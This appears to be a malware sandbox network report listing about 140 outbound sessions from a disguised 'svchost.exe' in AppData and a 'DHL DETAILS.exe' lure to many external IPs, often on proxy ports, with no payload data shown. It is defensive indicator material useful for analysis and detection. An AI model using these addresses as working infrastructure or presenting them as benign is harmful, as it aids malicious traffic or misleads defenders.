Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7058	192.168.2.5	49687	91.134.140.160	5401	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7059	192.168.2.5	49675	91.134.140.160	30895	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7060	192.168.2.5	49690	103.174.102.127	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7061	192.168.2.5	62713	72.217.158.202	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7062	192.168.2.5	49587	91.134.140.160	39803	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7063	192.168.2.5	49530	103.153.246.210	8080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7064	192.168.2.5	63637	145.239.199.241	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7065	192.168.2.5	58929	128.199.221.91	33383	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7066	192.168.2.5	63662	81.250.223.126	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7067	192.168.2.5	63171	104.248.158.78	43620	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7068	192.168.2.5	63686	123.110.158.236	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7069	192.168.2.5	63772	104.16.108.149	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7070	192.168.2.5	63784	162.159.242.10	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7071	192.168.2.5	63798	104.27.122.6	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7072	192.168.2.5	50170	107.180.90.42	10670	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7073	192.168.2.5	63704	162.223.91.11	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7074	192.168.2.5	63765	68.71.254.6	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7075	192.168.2.5	63804	74.48.7.43	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7076	192.168.2.5	63687	43.128.146.42	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7077	192.168.2.5	63703	91.107.180.250	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7078	192.168.2.5	62571	51.89.173.40	51511	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7079	192.168.2.5	63299	64.227.108.25	31908	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7080	192.168.2.5	63801	3.21.101.158	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7081	192.168.2.5	63715	14.103.24.20	8000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7082	192.168.2.5	63842	104.18.136.28	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7083	192.168.2.5	49662	185.104.63.54	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7084	192.168.2.5	62602	38.156.73.60	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7085	192.168.2.5	63785	185.109.184.150	63819	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7086	192.168.2.5	63214	115.74.157.191	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7087	192.168.2.5	63996	103.133.222.170	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7088	192.168.2.5	64002	103.133.222.170	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7089	192.168.2.5	64004	103.133.222.170	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7090	192.168.2.5	63927	104.20.75.31	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7091	192.168.2.5	63930	104.27.37.131	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7092	192.168.2.5	63936	185.162.228.128	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7093	192.168.2.5	63949	104.20.51.99	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7094	192.168.2.5	63937	162.159.242.159	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7095	192.168.2.5	63780	138.36.150.16	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7096	192.168.2.5	64008	103.133.222.170	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7097	192.168.2.5	59188	92.204.135.37	26927	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7098	192.168.2.5	63828	18.169.83.87	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7099	192.168.2.5	63887	20.210.113.32	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7100	192.168.2.5	63822	203.89.8.107	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7101	192.168.2.5	63275	104.238.111.107	8968	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7102	192.168.2.5	64070	49.51.93.222	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7103	192.168.2.5	64082	49.51.93.222	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7104	192.168.2.5	64093	49.51.93.222	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7105	192.168.2.5	64097	49.51.93.222	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7106	192.168.2.5	63886	3.122.84.99	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7107	192.168.2.5	63240	37.32.98.160	38440	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7108	192.168.2.5	62558	69.61.200.104	36181	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7109	192.168.2.5	63992	104.19.171.188	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7110	192.168.2.5	63875	103.154.139.130	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7111	192.168.2.5	63945	47.122.45.221	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7112	192.168.2.5	50388	162.241.137.197	60200	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7113	192.168.2.5	63951	103.231.78.36	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7114	192.168.2.5	63969	203.128.80.178	8099	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7115	192.168.2.5	63484	162.241.53.72	55693	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7116	192.168.2.5	63217	98.175.31.195	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7117	192.168.2.5	63406	1.224.3.122	3889	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7118	192.168.2.5	62788	162.241.53.72	62192	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7119	192.168.2.5	64207	172.67.182.165	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7120	192.168.2.5	64212	104.19.247.62	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7121	192.168.2.5	63975	202.150.1.87	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7122	192.168.2.5	64079	195.154.172.161	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7123	192.168.2.5	64006	194.247.173.17	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7124	192.168.2.5	62702	189.240.60.166	9090	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7125	192.168.2.5	64122	45.196.150.195	5432	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7126	192.168.2.5	63747	117.160.250.163	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7127	192.168.2.5	50481	38.183.135.189	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7128	192.168.2.5	50476	92.204.134.38	9375	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7129	192.168.2.5	63227	199.58.185.9	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7130	192.168.2.5	64224	20.111.54.16	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7131	192.168.2.5	64180	130.162.213.175	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7132	192.168.2.5	64219	218.252.244.126	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7133	192.168.2.5	64228	123.110.158.236	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7134	192.168.2.5	51070	190.216.234.186	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7135	192.168.2.5	64185	113.140.74.26	8000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7136	192.168.2.5	64127	122.155.165.191	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7137	192.168.2.5	63874	183.234.215.11	8443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7138	192.168.2.5	51001	161.97.173.42	53948	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7139	192.168.2.5	64225	27.65.240.157	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7140	192.168.2.5	64194	123.30.154.171	7777	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7141	192.168.2.5	64169	195.98.74.57	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7142	192.168.2.5	63709	192.252.216.81	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7143	192.168.2.5	63653	162.214.121.11	18809	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7144	192.168.2.5	59363	45.11.95.166	6005	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7145	192.168.2.5	63177	67.201.59.70	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7146	192.168.2.5	62726	36.90.60.255	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7147	192.168.2.5	59319	91.134.140.160	51513	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7148	192.168.2.5	64234	45.61.188.134	44499	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7149	192.168.2.5	64231	45.61.188.134	44499	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7150	192.168.2.5	59528	92.204.135.37	62969	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7151	192.168.2.5	62573	104.200.135.46	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7152	192.168.2.5	51580	46.226.148.105	36366	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7153	192.168.2.5	51972	38.41.0.60	11201	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7154	192.168.2.5	64230	43.128.146.42	15673	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7155	192.168.2.5	63630	94.131.107.45	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7156	192.168.2.5	62908	60.188.102.225	18080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7157	192.168.2.5	63659	138.36.199.14	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7158	192.168.2.5	64240	47.122.45.221	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7159	192.168.2.5	63761	45.174.87.18	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7160	192.168.2.5	63763	104.238.111.107	28394	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7161	192.168.2.5	64247	185.162.229.112	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7162	192.168.2.5	63000	68.169.60.220	8380	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7163	192.168.2.5	64373	104.21.80.83	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7164	192.168.2.5	64299	185.162.231.254	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7165	192.168.2.5	64317	107.180.103.214	45870	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7166	192.168.2.5	51733	103.165.234.46	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7167	192.168.2.5	64430	8.219.135.23	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7168	192.168.2.5	63958	222.124.135.123	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7169	192.168.2.5	63837	91.134.140.160	30895	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7170	192.168.2.5	64448	8.219.135.23	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7171	192.168.2.5	64451	8.219.135.23	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7172	192.168.2.5	64453	8.219.135.23	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7173	192.168.2.5	64256	194.247.173.17	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7174	192.168.2.5	52749	162.214.102.195	60891	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7175	192.168.2.5	64324	140.238.25.255	21000	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7176	192.168.2.5	65359	157.101.165.36	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7177	192.168.2.5	64284	167.71.5.83	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7178	192.168.2.5	64342	193.84.89.202	8443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7179	192.168.2.5	64270	122.51.123.219	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7180	192.168.2.5	52835	92.204.134.38	42571	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7181	192.168.2.5	59791	103.184.56.110	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7182	192.168.2.5	64271	91.202.230.219	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7183	192.168.2.5	64016	209.142.64.219	39789	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7184	192.168.2.5	64446	185.162.230.178	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7185	192.168.2.5	64346	42.193.58.96	8080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7186	192.168.2.5	64384	93.171.220.229	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7187	192.168.2.5	52100	107.180.90.248	43240	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7188	192.168.2.5	64441	67.201.59.70	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7189	192.168.2.5	52842	188.166.56.246	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7190	192.168.2.5	64025	14.37.251.116	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7191	192.168.2.5	52975	37.187.77.58	3139	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7192	192.168.2.5	64464	104.17.9.114	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7193	192.168.2.5	64470	173.245.49.27	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7194	192.168.2.5	64491	31.43.179.214	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7195	192.168.2.5	64496	172.67.3.98	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7196	192.168.2.5	64502	104.20.123.164	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7197	192.168.2.5	64104	103.79.96.193	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7198	192.168.2.5	64550	103.152.112.167	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7199	192.168.2.5	64399	178.128.82.105	39993	56176	C:\Users\user\AppData\Roaming\svchost.exe

